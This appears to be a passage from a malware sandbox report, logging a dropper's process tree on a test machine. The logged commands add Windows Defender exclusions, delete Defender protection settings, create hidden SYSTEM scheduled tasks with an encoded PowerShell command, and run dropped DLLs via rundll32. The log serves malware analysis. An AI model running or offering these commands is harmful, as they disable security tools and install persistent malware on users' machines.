C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LJVhNoouCIYvC" /t REG_DWORD /d 0 /reg:324⤵PID:336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LJVhNoouCIYvC" /t REG_DWORD /d 0 /reg:644⤵PID:1276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR" /t REG_DWORD /d 0 /reg:324⤵PID:1768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR" /t REG_DWORD /d 0 /reg:644⤵PID:1168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fFIwvsLyPfUn" /t REG_DWORD /d 0 /reg:324⤵PID:1116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fFIwvsLyPfUn" /t REG_DWORD /d 0 /reg:644⤵PID:1704
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nNTpTrwDNnPU2" /t REG_DWORD /d 0 /reg:324⤵PID:1528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nNTpTrwDNnPU2" /t REG_DWORD /d 0 /reg:644⤵PID:1560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xPPqLUFFU" /t REG_DWORD /d 0 /reg:324⤵PID:692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xPPqLUFFU" /t REG_DWORD /d 0 /reg:644⤵PID:748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\STCeEXnoOCFBHvVB" /t REG_DWORD /d 0 /reg:644⤵PID:1320
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr" /t REG_DWORD /d 0 /reg:324⤵PID:1060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pNGCAFJFsZdszXlNr" /t REG_DWORD /d 0 /reg:644⤵PID:864
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\STCeEXnoOCFBHvVB" /t REG_DWORD /d 0 /reg:324⤵PID:824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:644⤵PID:1904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dZAkCesbbUKSZxso" /t REG_DWORD /d 0 /reg:324⤵PID:288
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gJniXmsIH" /SC once /ST 04:44:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1960
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gJniXmsIH"3⤵PID:576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gJniXmsIH"3⤵PID:692
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1464
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1912
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1156
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yTojJpVlyxZWLIphK" /SC once /ST 01:46:27 /RU "SYSTEM" /TR "\"C:\Windows\Temp\dZAkCesbbUKSZxso\sOClMsGvOFCDJVp\ZkSYWem.exe\" 8a /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2036
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "yTojJpVlyxZWLIphK"3⤵PID:1656
-
-
-
C:\Windows\Temp\dZAkCesbbUKSZxso\sOClMsGvOFCDJVp\ZkSYWem.exeC:\Windows\Temp\dZAkCesbbUKSZxso\sOClMsGvOFCDJVp\ZkSYWem.exe 8a /site_id 525403 /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:996 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bcmBoHFysFBidtSprQ"3⤵PID:864
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:968
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1760
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:524
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:1100
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\xPPqLUFFU\FGlSXg.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "mvThVpxzbhgVRbG" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1276
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mvThVpxzbhgVRbG2" /F /xml "C:\Program Files (x86)\xPPqLUFFU\ofiZBaU.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:560
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "mvThVpxzbhgVRbG"3⤵PID:1668
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "mvThVpxzbhgVRbG"3⤵PID:1692
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xJPCobCplaVVxr" /F /xml "C:\Program Files (x86)\nNTpTrwDNnPU2\vwWmtWz.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1612
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xtMHrquZTnBqG2" /F /xml "C:\ProgramData\STCeEXnoOCFBHvVB\gmHTzDn.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1188
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "wJXbRFPdEfkDfWLvy2" /F /xml "C:\Program Files (x86)\cdLvKHOLDZopLOAbkDR\QoRJesY.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1020
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "whexYRdIIbHjcPpcGRQ2" /F /xml "C:\Program Files (x86)\LJVhNoouCIYvC\uuDAhrc.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1556
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "diAnMdtAazTJxxqKi" /SC once /ST 18:14:13 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\dZAkCesbbUKSZxso\XvkfUmep\cJSIiru.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1736
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "diAnMdtAazTJxxqKi"3⤵PID:1304
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1960
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:1976
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1992
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1528
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "yTojJpVlyxZWLIphK"3⤵PID:468
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\dZAkCesbbUKSZxso\XvkfUmep\cJSIiru.dll",#1 /site_id 5254032⤵PID:892
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\dZAkCesbbUKSZxso\XvkfUmep\cJSIiru.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:864 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "diAnMdtAazTJxxqKi"4⤵PID:1696
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1088
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1784
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1312
Network
MITRE ATT&CK Enterprise v6
Downloads